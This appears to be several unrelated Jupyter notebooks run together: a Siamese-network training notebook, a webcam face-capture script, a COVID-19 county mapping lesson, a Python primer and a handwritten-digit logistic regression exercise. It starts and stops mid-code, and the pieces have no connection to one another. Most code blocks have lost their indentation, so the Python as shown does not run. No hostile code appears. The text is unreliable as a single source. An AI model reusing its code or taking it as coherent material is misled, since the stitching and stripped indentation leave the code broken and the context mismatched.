min_index = distances_from_img_to_test_against.index(min(distances_from_img_to_test_against)) + 1
return sample_imgs, min_index
def evaluate(embedding_model, epochs = 0):
probs,yprob = compute_probs(embedding_model, x_test[:500, :], y_test[:500])
fpr, tpr, thresholds, auc = compute_metrics(probs,yprob)
draw_roc(fpr, tpr, thresholds, auc)
draw_interdist(embedding_model, epochs)
for i in range(3):
DrawTestImage(embedding_model, np.expand_dims(x_train[i],axis=0))
```
### Model Training Setup
FaceNet, the paper that introduced triplet batches, draws a large random sample of triplets respecting the class distribution, then picks N/2 hard and N/2 random samples (N = batch size), using an `alpha` of 0.2.
Logs out to Tensorboard, callback adapted from https://stackoverflow.com/a/52581175.
Saves best model only based on a validation loss. Adapted from https://stackoverflow.com/a/58103272.
```
# Hyperparams
batch_size = 256
epochs = 100
steps_per_epoch = int(x_train.shape[0]/batch_size)
val_steps = int(x_test.shape[0]/batch_size)
alpha = 0.2
num_hard = int(batch_size * 0.5) # Number of semi-hard triplet examples in the batch
lr = 0.00006
optimiser = 'Adam'
emb_size = 10
with tf.device("/cpu:0"):
# Create the embedding model
print("Generating embedding model... \n")
embedding_model = create_embedding_model(emb_size)
print("\nGenerating SNN... \n")
# Create the SNN
siamese_net = create_SNN(embedding_model)
# Compile the SNN
optimiser_obj = Adam(lr = lr)
siamese_net.compile(loss=triplet_loss, optimizer= optimiser_obj)
# Store visualisations of the embeddings using PCA for display next to "after training" for comparisons
num_vis = 500 # Take only the first num_vis elements of the test set to visualise
embeddings_before_train = embedding_model.predict(x_test[:num_vis, :])
pca = PCA(n_components=2)
decomposed_embeddings_before = pca.fit_transform(embeddings_before_train)
# Display evaluation of the untrained model
print("\nEvaluating the model without training for a baseline...\n")
evaluate(embedding_model)
# Set up logging directory
## Use date-time as logdir name:
#dt = datetime.now().strftime("%Y%m%dT%H%M")
#logdir = os.path.join("PATH/TO/LOGDIR",dt)
## Use a custom non-dt name:
name = "snn-example-run"
logdir = os.path.join("PATH/TO/LOGDIR",name)
if not os.path.exists(logdir):
os.mkdir(logdir)
## Callbacks:
# Create the TensorBoard callback
tensorboard = tf.keras.callbacks.TensorBoard(
log_dir = logdir,
histogram_freq=0,
batch_size=batch_size,
write_graph=True,
write_grads=True,
write_images = True,
update_freq = 'epoch',
profile_batch=0
)
# Training logger
csv_log = os.path.join(logdir, 'training.csv')
csv_logger = CSVLogger(csv_log, separator=',', append=True)
# Only save the best model weights based on the val_loss
checkpoint = ModelCheckpoint(os.path.join(logdir, 'snn_model-{epoch:02d}-{val_loss:.2f}.h5'),
monitor='val_loss', verbose=1,
save_best_only=True, save_weights_only=True,
mode='auto')
# Save the embedding model weights based on the main model's val_loss
# This is needed to recreate the embedding model should we wish to visualise
# the latent space at the saved epoch
class SaveEmbeddingModelWeights(Callback):
def __init__(self, filepath, monitor='val_loss', verbose=1):
super(Callback, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.best = np.Inf
self.filepath = filepath
def on_epoch_end(self, epoch, logs={}):
current = logs.get(self.monitor)
if current is None:
warnings.warn("SaveEmbeddingModelWeights requires %s available!" % self.monitor, RuntimeWarning)
return
if current < self.best:
filepath = self.filepath.format(epoch=epoch + 1, **logs)
#if self.verbose == 1:
#print("Saving embedding model weights at %s" % filepath)
embedding_model.save_weights(filepath, overwrite = True)
self.best = current
# Save the embedding model weights if you save a new snn best model based on the model checkpoint above
emb_weight_saver = SaveEmbeddingModelWeights(os.path.join(logdir, 'emb_model-{epoch:02d}.h5'))
callbacks = [tensorboard, csv_logger, checkpoint, emb_weight_saver]
# Save model configs to JSON
model_json = siamese_net.to_json()
with open(os.path.join(logdir, "siamese_config.json"), "w") as json_file:
json_file.write(model_json)
json_file.close()
model_json = embedding_model.to_json()
with open(os.path.join(logdir, "embedding_config.json"), "w") as json_file:
json_file.write(model_json)
json_file.close()
hyperparams = {'batch_size' : batch_size,
'epochs' : epochs,
'steps_per_epoch' : steps_per_epoch,
'val_steps' : val_steps,
'alpha' : alpha,
'num_hard' : num_hard,
'optimiser' : optimiser,
'lr' : lr,
'emb_size' : emb_size
}
with open(os.path.join(logdir, "hyperparams.json"), "w") as json_file:
json.dump(hyperparams, json_file)
# Attach the model to the TensorBoard callback
tensorboard.set_model(siamese_net)
def delete_older_model_files(filepath):
model_dir = filepath.split("emb_model")[0]
# Get model files
model_files = os.listdir(model_dir)
# Get only the emb_model files
emb_model_files = [file for file in model_files if "emb_model" in file]
# Get the epoch nums of the emb_model_files
emb_model_files_epoch_nums = [int(file.split("-")[1].split(".h5")[0]) for file in emb_model_files]
# Find all the snn model files
snn_model_files = [file for file in model_files if "snn_model" in file]
# Sort, get highest epoch num
emb_model_files_epoch_nums.sort()
highest_epoch_num = str(emb_model_files_epoch_nums[-1]).zfill(2)
# Filter the emb_model and snn_model file lists to remove the highest epoch number ones
emb_model_files_without_highest = [file for file in emb_model_files if highest_epoch_num not in file]
snn_model_files_without_highest = [file for file in snn_model_files if ("-" + highest_epoch_num + "-") not in file]
# Delete the non-highest model files from the subdir
if len(emb_model_files_without_highest) != 0:
print("Deleting previous best model file")
for model_file_list in [emb_model_files_without_highest, snn_model_files_without_highest]:
for file in model_file_list:
os.remove(os.path.join(model_dir, file))
```
### Show example batches
Based on code found [here](https://zhangruochi.com/Create-a-Siamese-Network-with-Triplet-Loss-in-Keras/2020/08/11/).
```
# Display sample batches. This has to be performed after the embedding model is created,
# as create_hard_batch utilises the model to see which triplets are actually hard.
examples = create_batch(1)
print("Example triplet batch:")
plot_triplets(examples)
print("Example semi-hard triplet batch:")
ex_hard = create_hard_batch(1, 1, split="train")
plot_triplets(ex_hard)
```
### Training
Using `.fit(workers = 0)` fixes the error when using hard batches where TF can't predict on the embedding network whilst fitting the siamese network (see: https://github.com/keras-team/keras/issues/5511#issuecomment-427666222).
```
def get_num_gpus():
local_device_protos = device_lib.list_local_devices()
return len([x.name for x in local_device_protos if x.device_type == 'GPU'])
## Training:
#print("Logging out to Tensorboard at:", logdir)
print("Starting training process!")
print("-------------------------------------")
# Spread the model across the available GPUs
num_gpus = get_num_gpus()
parallel_snn = multi_gpu_model(siamese_net, gpus = num_gpus)
batch_per_gpu = int(batch_size / num_gpus)
parallel_snn.compile(loss=triplet_loss, optimizer= optimiser_obj)
siamese_history = parallel_snn.fit(
data_generator(batch_per_gpu, num_hard),
steps_per_epoch=steps_per_epoch,
epochs=epochs,
verbose=1,
callbacks=callbacks,
workers = 0,
validation_data = data_generator(batch_per_gpu, num_hard, split="test"),
validation_steps = val_steps)
print("-------------------------------------")
print("Training complete.")
```
### Evaluate the trained network
Load the best-performing models. We need to load the weights and configs separately rather than using `model.load()` because our custom loss function relies on the embedding length. It is therefore easier to load the weights and configs separately and rebuild the models from them.
```
def json_to_dict(json_src):
with open(json_src, 'r') as j:
return json.loads(j.read())
## Load in best trained SNN and emb model
# The best-performing model weights have the highest epoch number, since weights are only saved when val_loss improves
highest_epoch = 0
dir_list = os.listdir(logdir)
for file in dir_list:
if file.endswith(".h5"):
epoch_num = int(file.split("-")[1].split(".h5")[0])
if epoch_num > highest_epoch:
highest_epoch = epoch_num
# Find the embedding and SNN weights src for the highest_epoch (best) model
for file in dir_list:
# zfill ensures a leading 0 on epoch numbers < 10
if ("-" + str(highest_epoch).zfill(2)) in file:
if file.startswith("emb"):
embedding_weights_src = os.path.join(logdir, file)
elif file.startswith("snn"):
snn_weights_src = os.path.join(logdir, file)
hyperparams = os.path.join(logdir, "hyperparams.json")
snn_config = os.path.join(logdir, "siamese_config.json")
emb_config = os.path.join(logdir, "embedding_config.json")
snn_config = json_to_dict(snn_config)
emb_config = json_to_dict(emb_config)
# json.dumps to make the dict a string, as required by model_from_json
loaded_snn_model = model_from_json(json.dumps(snn_config))
loaded_snn_model.load_weights(snn_weights_src)
loaded_emb_model = model_from_json(json.dumps(emb_config))
loaded_emb_model.load_weights(embedding_weights_src)
# Store visualisations of the embeddings using PCA for display next to "after training" for comparisons
embeddings_after_train = loaded_emb_model.predict(x_test[:num_vis, :])
pca = PCA(n_components=2)
decomposed_embeddings_after = pca.fit_transform(embeddings_after_train)
evaluate(loaded_emb_model, highest_epoch)
```
### Comparisons of the embeddings in the latent space
Based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).
```
step = 1 # Step = 1, take every element
dict_embeddings = {}
dict_gray = {}
test_class_labels = np.unique(np.array(y_test))
decomposed_embeddings_after = pca.fit_transform(embeddings_after_train)
fig = plt.figure(figsize=(16, 8))
for label in test_class_labels:
y_test_labels = y_test[:num_vis]
decomposed_embeddings_class_before = decomposed_embeddings_before[y_test_labels == label]
decomposed_embeddings_class_after = decomposed_embeddings_after[y_test_labels == label]
plt.subplot(1,2,1)
plt.scatter(decomposed_embeddings_class_before[::step, 1], decomposed_embeddings_class_before[::step, 0], label=str(label))
plt.title('Embedding Locations Before Training')
plt.legend()
plt.subplot(1,2,2)
plt.scatter(decomposed_embeddings_class_after[::step, 1], decomposed_embeddings_class_after[::step, 0], label=str(label))
plt.title('Embedding Locations After %d Training Epochs' % epochs)
plt.legend()
plt.show()
```
### Determine n_way_accuracy
```
prototypes = generate_prototypes(x_test, y_test, loaded_emb_model)
n_way_accuracy_prototypes(val_steps, num_classes, loaded_emb_model)
```
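Conceptually, an n-way trial embeds a query image and n candidate images (one of which shares the query's class, or a class prototype) and checks whether the nearest candidate in embedding space is the matching one. A minimal sketch of that nearest-prototype decision (the function name here is illustrative, not one of the notebook's helpers):

```python
import numpy as np

def nearest_prototype(query_emb, prototype_embs):
    # Euclidean distance from the query embedding to each class prototype
    dists = np.linalg.norm(prototype_embs - query_emb, axis=1)
    # predicted class = index of the closest prototype
    return int(np.argmin(dists))
```

n-way accuracy is then simply the fraction of trials where this index points at the correct class.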
### Visualise support set inference
Based on code found [here](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).
```
n_samples = 10
sample_imgs, min_index = visualise_n_way_prototypes(n_samples, loaded_emb_model)
img_matrix = []
for index in range(1, len(sample_imgs)):
img_matrix.append(np.reshape(sample_imgs[index], (x_train_w, x_train_h)))
img_matrix = np.asarray(img_matrix)
img_matrix = np.vstack(img_matrix)
f, ax = plt.subplots(1, 3, figsize = (10, 12))
f.tight_layout()
ax[0].imshow(np.reshape(sample_imgs[0], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
ax[0].set_title("Test Image")
ax[1].imshow(img_matrix ,vmin=0, vmax=1,cmap='Greys')
ax[1].set_title("Support Set (Img of same class shown first)")
ax[2].imshow(np.reshape(sample_imgs[min_index], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
ax[2].set_title("Image most similar to Test Image in Support Set")
```
```
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as image
import os
import cv2
capture = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')
#Iterate to save data for each face
face_data = []
face_name = input("Enter face name :")
dataset_path = './data/'
#non-unique count, faces captured in total
facecount = 0
while True:
#ret is a return code, frame is the frame captured
ret, frame = capture.read()
#ret is False if the frame was not captured properly, so we skip that frame
if ret == False:
continue
#convert the frame to grayscale for face detection
grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#stores the faces coordinates in rectangle start, width and height
faces = face_cascade.detectMultiScale(grayscale, 1.3, 5)
#iterating over each face detected in that particular frame
for face in faces:
#extracting our values from face
x,y,w,h = face
#offset value to increase our displayed rectangle size
offset = 50
#creating a rectangle using the coordinates known, top-left and bottom-right, color, and width
cv2.rectangle(grayscale, (x - offset, y - offset), (x+w+offset, y+h+offset), (255,255,255), 4)
#Slice of frame to select out face part
face_section = grayscale[y - offset : y + h + offset, x - offset : x + w + offset]
#resizing face section to a particular standard so that we will be able to apply KNN later
face_section = cv2.resize(face_section, (100,100))
#Storing facial data
face_data.append(face_section)
#increment facecount, better to interpret as framecount or size of training data
facecount += 1
print(facecount)
cv2.imshow("Face Detection", grayscale)
#the bitwise AND masks the pressed key code to its low 8 bits and compares it to the code of the given key
#loop breaks if key matches
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#releases capture interface
capture.release()
#closes any windows created, not doing so will cause process to freeze
cv2.destroyAllWindows()
#convert list of face sections to a numpy array
face_data = np.asarray(face_data)
#reshape, flattening to 1d rows; -1 lets the other dimension adjust in favor of maintaining the specified one
face_data = face_data.reshape((face_data.shape[0],-1))
print(np.shape(face_data))
#saving data to path
np.save(dataset_path + face_name, face_data)
```
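The comments above mention applying KNN later to the saved `.npy` face data. A minimal sketch of that nearest-neighbour step (the function name and `k` value are illustrative, not part of this script):

```python
import numpy as np

def knn_predict(train_X, train_y, sample, k=5):
    # Euclidean distance from the query face vector to every stored face
    dists = np.linalg.norm(train_X - sample, axis=1)
    # take the labels of the k nearest stored faces and majority-vote
    nearest = train_y[np.argsort(dists)[:k]]
    labels, counts = np.unique(nearest, return_counts=True)
    return labels[np.argmax(counts)]
```

Here `train_X` would be the stacked, flattened face rows loaded back with `np.load`, and `train_y` the corresponding face names.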
# Gateway Exploration
In this final segment you can take what you have learned and try it yourself. This segment is displayed in "Notebook Mode" rather than "Presentation Mode." So you will need to scroll down as you explore more content. Notebook mode will allow you to see more content at once. It also allows you to compare and contrast cells and visualizations.
Here you are free to explore as much as you want. There are lots of suggestions in the text and in comments in the code cells. Feel free to change attributes, code pieces, etc. If a code cell breaks (e.g., you see an error), then use a search engine to look up the error to see if you can try to solve it yourself. Another way to fix problems is to compare your code to the original code, which you can see here:
https://github.com/hourofci/lessons-dev/blob/master/gateway-lesson/gateway/gateway-exploration.ipynb
Enjoy two explorations to apply what you learned at a deeper level:
1. Data Wrangling - View, Clean, Extract, and Merge Data
2. Data Visualization - Making Maps
So start scrolling down. Explore and try it yourself!
```
# This code cell starts the necessary setup for Hour of CI lesson notebooks.
# First, it enables users to hide and unhide code by producing a 'Toggle raw code' button below.
# Second, it imports the hourofci package, which is necessary for lessons and interactive Jupyter Widgets.
# Third, it helps hide/control other aspects of Jupyter Notebooks to improve the user experience
# This is an initialization cell
# It is not displayed because the Slide Type is 'Skip'
from IPython.display import HTML, IFrame, Javascript, display
from ipywidgets import interactive
import ipywidgets as widgets
from ipywidgets import Layout
import getpass # This library allows us to get the username (User agent string)
# import package for hourofci project
import sys
sys.path.append('../../supplementary') # relative path (may change depending on the location of the lesson notebook)
import hourofci
# Retrieve the user agent string; it will be passed to the hourofci submit button
agent_js = """
IPython.notebook.kernel.execute("user_agent = " + "'" + navigator.userAgent + "'");
"""
Javascript(agent_js)
# load javascript to initialize/hide cells, get user agent string, and hide output indicator
# hide code by introducing a toggle button "Toggle raw code"
HTML('''
<script type="text/javascript" src=\"../../supplementary/js/custom.js\"></script>
<input id="toggle_code" type="button" value="Toggle raw code">
''')
```
## Setup
As always, you have to import the specific Python packages you'll need. You'll learn more about these in the other lessons, so for now let's import all of the packages that we will use for the Gateway Exploration component. If you want to dig deeper, feel free to search each package to understand what it does and what it can do for you.
As before, run this code by clicking the Run button left of the code cell.
Wait for the code to run. This is shown by the asterisk inside the brackets of <pre>In [ ]:</pre>. When it changes to a number and the print output shows up, you're good to go.
```
# Run this code by clicking the Run button on the left to import all of the packages
from matplotlib import pyplot
import pandas
import geopandas
import os
import pprint
import IPython
from shapely.geometry import Polygon
import numpy as np
from datetime import datetime
print("Modules imported")
```
## Download COVID-19 Data
This optional code cell will download the US county level data released by the New York Times that we demonstrated earlier. It's found here: https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv.
The code below gets the data from the URL and puts it into a local file called "us-counties.csv"
Skip this step if you already downloaded this data in an earlier segment. You can always come back and re-run it if you need to.
```
# Run this code cell if you have not yet downloaded the Covid-19 data from the New York Times
!wget https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv -O us-counties.csv
```
## Exploration 1: View, Clean, Extract, and Merge Data
### View the data
Once you have downloaded the data file, you should look at it to make sure it is what you want.
To do that, we'll convert the downloaded file into a format that our Python program can use. Here we're going to use the dataframe format provided by the Pandas package.
Recall that dataframes can be thought of as two-dimensional arrays or spreadsheets.
```
#Read the data that we downloaded from the NYT into a dataframe
covid_counties = pandas.read_csv('./us-counties.csv')
# And let's see what it looks like!
print(covid_counties)
```
### Clean the Data
In large datasets like this, there are often a few cells scattered around that may cause you problems. Cleaning data is an important and often complex step; it is one part of **data wrangling.** For now, let's just look for the most common problem - empty cells where a value is expected. These are known as null cells, and if a number is expected it will show up as NaN (not a number) in your dataframe.
Let's see if we can find if we have any of these in our data.
Since we're going to use the "fips" column to group our data, we need to know that there are no null cells in that column. (The "FIPS" code is a unique identifier for geographic places. Google it if you want to know more!)
```
#Are there NaN cells in the fips column?
covid_counties['fips'].isnull().values.any()
#How many null cells are in the fips column?
count_nan = covid_counties['fips'].isnull().sum()
print ('Count of rows with null fips codes: ' + str(count_nan))
```
Ah ha, we found lots of problems in our data!
Let's remove those rows. Here we'll make a cleaned dataframe that keeps only the rows with non-null fips codes.
```
covid_counties_clean = covid_counties[covid_counties['fips'].notnull()]
print(covid_counties_clean)
```
### Extract Data
Since we have a row for each day in the dataset, we will use the **groupby** function to group _daily cases_ by _county_. Since some county names are found in more than one state, we have to group by _county_ and _state_ (as well as the fips code, to be sure). We will add them all up using the **sum** function.
```
# In our earlier segment we only looked at cases.
# What if we also wanted to look at deaths?
# Here we use [['cases', 'deaths']] below instead of just ['cases'].
# This will group both cases and deaths by fips, county, and state values.
covid_grouped = covid_counties_clean.groupby(['fips','county','state'])[['cases', 'deaths']]
# Second, add up all the Covid-19 cases using sum
covid_total = covid_grouped.sum()
#View the result, which should include the columns "fips, county, state, cases, deaths"
covid_total
```
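To see the groupby-then-sum pattern on a tiny toy frame (synthetic values, not the COVID data):

```python
import pandas as pd

# toy frame: two daily rows for county A, one for county B
toy = pd.DataFrame({'fips':   [1, 1, 2],
                    'county': ['A', 'A', 'B'],
                    'state':  ['X', 'X', 'X'],
                    'cases':  [3, 4, 5],
                    'deaths': [0, 1, 2]})
# group the daily rows by place and add them up, just as above
totals = toy.groupby(['fips', 'county', 'state'])[['cases', 'deaths']].sum()
print(totals)
```

County A's two daily rows collapse into one row with cases 7 and deaths 1.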
Now we could apply some basic arithmetic for the rows using Pandas.
Let's get the number of deaths per case for each county. This is called the Case Fatality Rate (CFR). We multiply by 100.0 to get a percentage.
Before you run the code, make sure you understand that we are dividing deaths by cases for each row.
```
covid_total['deathpercase']=covid_total['deaths']/covid_total['cases']*100.0
# Print out the new 'covid_total' dataframe with a new 'deathpercase' column
covid_total
```
Now that we have our data we can try some basic visualizations. Let's try making a scatter plot of cases on the x-axis and deaths on the y-axis.
```
covid_total.plot.scatter(x='cases', y='deaths')
```
Here are a few things you can try adding to the scatter function as parameters (remember to use commas to separate each of them).
```python
# Change the size of the dots
# s=covid_total['deathpercase']
# s=covid_total['deathpercase']*2
```
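For example, on a tiny synthetic stand-in for `covid_total` (made-up numbers, just to demonstrate the `s` parameter):

```python
import pandas as pd

# tiny synthetic stand-in for covid_total
demo = pd.DataFrame({'cases': [100, 500, 2000],
                     'deaths': [2, 20, 60]})
demo['deathpercase'] = demo['deaths'] / demo['cases'] * 100.0
# size each dot by its case-fatality percentage
demo.plot.scatter(x='cases', y='deaths', s=demo['deathpercase'] * 5)
```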
And, try a hex-bin plot.
```
covid_total.plot.hexbin(x='cases', y='deaths', gridsize=5)
```
### Merge data
Now we'll load "supplementary/counties_geometry.geojson" into a geodataframe. You loaded this same file in an earlier segment on mapping Covid-19. We will (again) use **merge** to merge these two datasets into a **merged** geodataframe.
```
counties_geojson = geopandas.read_file("./supplementary/counties_geometry.geojson")
# Merge geography (counties_geojson) and covid cases and deaths (covid_total)
merged = pandas.merge(counties_geojson, covid_total, how='left',
left_on=['NAME','state_name'], right_on = ['county','state'])
# Let's take a quick look at our new merged geodataframe
merged
```
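The effect of `how='left'` is easy to see on toy tables (synthetic values): every geography row is kept, and rows with no matching totals get NaN.

```python
import pandas as pd

# toy geography table and toy totals table
geo = pd.DataFrame({'NAME': ['A', 'B'], 'state_name': ['X', 'X']})
totals = pd.DataFrame({'county': ['A'], 'state': ['X'], 'cases': [7]})
# left merge: keep every geography row, attach totals where the keys match
out = pd.merge(geo, totals, how='left',
               left_on=['NAME', 'state_name'], right_on=['county', 'state'])
print(out)
```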
## 2. More Mapping
Now that we have a merged dataset. We can try to create a few different maps. In this Exploration you can try to improve your first map.
Here is the code from your first map. Run this code and then scroll down.
```
merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=True,
legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})
pyplot.title("Number of Confirmed Cases")
```
Below is that code chunk again. Now you can try changing the code to improve the look of your map. There are a lot of options to change.
<u>If you break something, then just copy and paste the original code above to "reset".</u>
- *column* represents the column that is being mapped. Change what you are mapping by replacing 'cases' with 'deaths' or 'deathpercase'
- *cmap* represents the colormap. You can try any number of these by replacing 'OrRd' with: 'Purples' or 'Greens' or 'gist_gray'. There are lots of choices that you can see here: https://matplotlib.org/tutorials/colors/colormaps.html. If you want to learn more about color schemes check out: https://colorbrewer2.org
- *scheme* represents the scheme for creating classes. Try a few other options by replacing 'fisher_jenks' with: 'natural_breaks' or 'quantiles'
- *loc* represents the location of your legend. Move your legend by replacing 'lower left' with 'upper right' or 'upper left'
- *title* represents the text in the legend box. If you changed the column that you are mapping, make sure to change the title too.
Want to try more? Check out here for even more options
https://geopandas.org/mapping.html#choropleth-maps
```
merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=True,
legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})
pyplot.title("Number of Confirmed Cases")
```
# Congratulations!
**You have finished an Hour of CI!**
But, before you go ...
1. Please fill out a very brief questionnaire to provide feedback and help us improve the Hour of CI lessons. It is fast and your feedback is very important to let us know what you learned and how we can improve the lessons in the future.
2. If you would like a certificate, then please type your name below and click "Create Certificate" and you will be presented with a PDF certificate.
<font size="+1"><a style="background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;" href="https://forms.gle/JUUBm76rLB8iYppN7">Take the questionnaire and provide feedback</a></font>
```
# This code cell loads the Interact Textbox that will ask users for their name
# Once they click "Create Certificate" then it will add their name to the certificate template
# And present them a PDF certificate
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from ipywidgets import interact
def make_cert(learner_name, lesson_name):
cert_filename = 'hourofci_certificate.pdf'
img = Image.open("../../supplementary/hci-certificate-template.jpg")
draw = ImageDraw.Draw(img)
cert_font = ImageFont.truetype('../../supplementary/cruft.ttf', 150)
cert_fontsm = ImageFont.truetype('../../supplementary/cruft.ttf', 80)
w,h = cert_font.getsize(learner_name)
draw.text( xy = (1650-w/2,1100-h/2), text = learner_name, fill=(0,0,0),font=cert_font)
w,h = cert_fontsm.getsize(lesson_name)
draw.text( xy = (1650-w/2,1100-h/2 + 750), text = lesson_name, fill=(0,0,0),font=cert_fontsm)
img.save(cert_filename, "PDF", resolution=100.0)
return cert_filename
interact_cert=interact.options(manual=True, manual_name="Create Certificate")
@interact_cert(name="Your Name")
def f(name):
print("Congratulations",name)
filename = make_cert(name, 'Gateway')
print("Download your certificate by clicking the link below.")
```
<font size="+1"><a style="background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;" href="hourofci_certificate.pdf?download=1" download="hourofci_certificate.pdf">Download your certificate</a></font>
# Welcome to Python!
There are many excellent Python and Jupyter/IPython tutorials out there. This Notebook contains a few snippets of code from here and there, but we suggest you go over some in-depth tutorials, especially if you are not familiar with Python.
Here we borrow some material from:
- [A Crash Course in Python for Scientists](http://nbviewer.ipython.org/gist/rpmuller/5920182) (which itself contains some nice links to other tutorials),
- [matplotlib examples](http://matplotlib.org/gallery.html#),
- [Chapter 1 from Pandas Cookbook](http://nbviewer.ipython.org/github/jvns/pandas-cookbook/tree/master/cookbook/)
This short introduction is itself written in Jupyter Notebook. See the Project 0 setup instructions to start a Jupyter server and open this notebook there.
As a starting point, you can simply type in expressions into the python shell in the browser.
```
8+8
```
Pressing Enter adds a new line to the **cell**. To execute the commands, either press the **play** button or use Shift+Enter.
```
days_of_the_week = ["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]
for day in days_of_the_week:
statement = "Today is " + day
print(statement)
```
The above code uses a List. In case you haven't realized it yet, Python uses indentation to determine scope, so there is no need to enclose code within {} or similar constructs.
The other data structures in Python include Tuples and Dictionaries. Tuples are similar to Lists but are immutable, so we can't modify them (say, by appending). Dictionaries are similar to Maps.
```
tuple1 = (1,2,'hi',9.0)
tuple1
# The following code will give an error since we are trying to change an immutable object
tuple1.append(7)
ages_dictionary = {"Rick": 46, "Bob": 86, "Fred": 21}
print("Rick's age is ",ages_dictionary["Rick"])
```
### Functions
Here we write a quick function to compute the Fibonacci sequence (remember this from Discrete Math?)
```
def fibonacci(sequence_length):
"Return the Fibonacci sequence of length *sequence_length*"
sequence = [0,1]
if sequence_length < 1:
print("Fibonacci sequence only defined for length 1 or greater")
return
if 0 < sequence_length < 3:
return sequence[:sequence_length]
for i in range(2,sequence_length):
sequence.append(sequence[i-1]+sequence[i-2])
return sequence
help(fibonacci)
fibonacci(10)
```
The following function shows several interesting features, including the ability to return multiple values as a tuple, and the idea of "tuple assignment", where objects are unpacked into variables (the first line after for).
```
positions = [
('Bob',0.0,21.0),
('Cat',2.5,13.1),
('Dog',33.0,1.2)
]
def minmax(objects):
minx = 1e20 # These are set to really big numbers
miny = 1e20
for obj in objects:
name,x,y = obj
if x < minx:
minx = x
if y < miny:
miny = y
return minx,miny
x,y = minmax(positions)
print(x,y)
import bs4
import requests
bs4
requests
from bs4 import BeautifulSoup
```
From here you could write a script to, say, scrape a web page. We will dive more into this in a future class when we look at data scraping.
# Multi-class Classification and Neural Networks
## 1. Multi-class Classification
In this exercise, we will use logistic regression and neural networks to recognize handwritten digits (from 0 to 9).
### 1.1 Dataset
The dataset ex3data1.mat contains 5000 training examples of handwritten digits. Each training example is a 20 pixel by 20 pixel grayscale image of the digit. Each pixel is represented by a floating point number indicating the grayscale intensity at that location (value between -1 and 1). The 20 by 20 grid of pixels is flattened into a 400-element vector. Each training example is a single row in the data matrix X. This results in a 5000 by 400 matrix X where every row is a training example.
$$ X=\left[\matrix{-(x^{(1)})^T-\\ -(x^{(2)})^T-\\ \vdots\\ -(x^{(m)})^T-}\right]_{5000\times400} $$
The other data in the training set is a 5000-element vector y that contains labels for the training set. Since the data was prepared for MATLAB, in which indexing starts from 1, digits 0-9 were converted to 1-10. Here, we will convert them back to 0-9 labels.
```
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
from scipy.io import loadmat
data = loadmat('ex3data1.mat')
X = data["X"] # 5000x400 np array
y = data["y"] # 5000x1 np array (2d)
y = y.flatten() # change to (5000,) 1d array and
y[y==10] = 0 # convert to 0-9 scale from 1-10 scale
```
### 1.2 Visualizing the data
```
def displayData(X):
"""displays the 100 rows of digit image data stored in X in a nice grid.
It returns the figure handle fig, ax
"""
# form the big 10 x 10 matrix containing all 100 images data
# padding between 2 images
pad = 1
# initialize matrix with -1 (black)
wholeimage = -np.ones((20*10+9, 20*10+9))
# fill values
for i in range(10):
for j in range(10):
wholeimage[j*21:j*21+20, i*21:i*21+20] = X[10*i+j, :].reshape((20, 20))
fig, ax = plt.subplots(figsize=(6, 6))
ax.imshow(wholeimage.T, cmap=plt.cm.gray, vmin=-1, vmax=1)
ax.axis('off')
return fig, ax
x = X[3200:3300, :]
fig, ax = displayData(x)
ax.axis('off')
# randomly select 100 data points to display
rand_indices = np.random.randint(0, 5000, size=100)
sel = X[rand_indices, :]
# display images
fig, ax = displayData(sel)
```
### 1.3 Vectorizing Logistic Regression
Since it was already vectorized in assignment 2, we will just copy the function here, renaming it to lrCostFunction(). This includes regularization.
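For reference, the regularized cost and gradient implemented below are (note that $\theta_0$ is not regularized):

$$ J(\theta)=\frac{1}{m}\sum_{i=1}^{m}\left[-y^{(i)}\log h_\theta(x^{(i)})-(1-y^{(i)})\log\left(1-h_\theta(x^{(i)})\right)\right]+\frac{\lambda}{2m}\sum_{j=1}^{n}\theta_j^2 $$

$$ \frac{\partial J}{\partial\theta_j}=\frac{1}{m}\sum_{i=1}^{m}\left(h_\theta(x^{(i)})-y^{(i)}\right)x_j^{(i)}+\frac{\lambda}{m}\theta_j \qquad (j\geq 1) $$

where $h_\theta(x)=\sigma(\theta^T x)$.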
```
def sigmoid(z):
"""sigmoid(z) computes the sigmoid of z. z can be a number,
vector, or matrix.
"""
g = 1 / (1 + np.exp(-z))
return g
def lrCostFunction(theta, X, y, lmd):
    """Computes the cost of using theta as the parameter for regularized
    logistic regression, and the gradient of the cost w.r.t. the parameters.
    """
    m = len(y)
    # prepare for matrix calculations
    y = y[:, np.newaxis]
    # to prevent errors in scipy.optimize.minimize(method='CG'):
    # unroll theta first, then make sure theta is an (n+1) by 1 array
    theta = theta.ravel()
    theta = theta[:, np.newaxis]
    # cost; the last term is the regularization (theta[0] is not regularized)
    J = (-y.T@np.log(sigmoid(X@theta)))/m - ((1-y.T)@np.log(1-sigmoid(X@theta)))/m + (theta[1:].T@theta[1:])*lmd/(2*m)
    # gradient
    grad = np.zeros(theta.shape)
    # newaxis keeps the first row of X.T as a 2d array instead of a 1d array
    grad[0] = X.T[0, np.newaxis, :]@(sigmoid(X@theta)-y)/m
    grad[1:] = X.T[1:, :]@(sigmoid(X@theta)-y)/m + lmd*theta[1:]/m
    return J, grad.flatten()
# Test lrCostFunction
theta_t = np.array([-2, -1, 1, 2])
